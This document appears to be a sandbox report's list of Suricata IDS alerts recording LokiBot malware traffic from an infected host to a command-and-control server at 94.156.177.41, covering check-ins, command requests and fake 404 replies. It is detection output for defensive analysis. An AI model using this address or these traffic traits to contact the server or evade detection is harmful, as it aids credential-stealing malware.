                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49200 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49237 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49231 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49237 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49231 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49248 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49248 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49255 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49252 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49213
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49248
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49175 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49197 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49197 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49197 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49187 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49231 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49187 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49203
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49231 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49267 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49267 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49267 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49267 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49267 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49273 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49190 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49226 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49226 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49197 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49197 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49273 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49187 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49252 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49231
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49177
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49238
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49215 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49215 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49190 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49226 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49211 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49175 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49187 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49254 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49227 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49273 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49205 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49262 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49262 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49215 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49262 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49169 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49267
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49169 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49200
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49254
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49173 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49173 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49215 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49226 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49226 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49226
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49217 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49211 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49187 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49175 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49247 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49237
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49227 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49227 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49234 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49234 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49227 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49215 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49234 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49262 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49197
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49262 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49217 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49211 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49234 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49234 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49190
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49211 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49247 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49247 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49234
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49205 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49247 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49247 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49227 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49175
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49205 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49227
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49217 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49262
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49211 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49259 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49259 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49184 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49259 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49184 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49169 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49184 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49187
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49217 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49169 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49242 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49217 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49242 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49247
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49198 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49255
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49205 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49205 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49228 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49269 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49180 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49184 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49242 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49259 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49198 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49214
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49259 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49198 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49173
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49217
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49228 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49261 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49228 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49273
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49211
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49180 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49184 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49228 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49228 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49269 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49259
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49235
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49208 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49208 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49265 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49208 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49264 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49264 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49265 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49264 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49210 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49265 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49198 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49169 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49189 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49215
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49198 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49242 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49242 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49180 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49252
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49210 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49261 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49210 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49269 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49228
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49264 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49264 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49219 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49210 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49198
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49205
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49169
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49265 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49180 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49210 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49180 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49242
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49269 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49269 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49263 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49261 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49241 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49208 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49184
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49264
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49208 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49249 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49180
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49241 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49241 -> 94.156.177.41:80
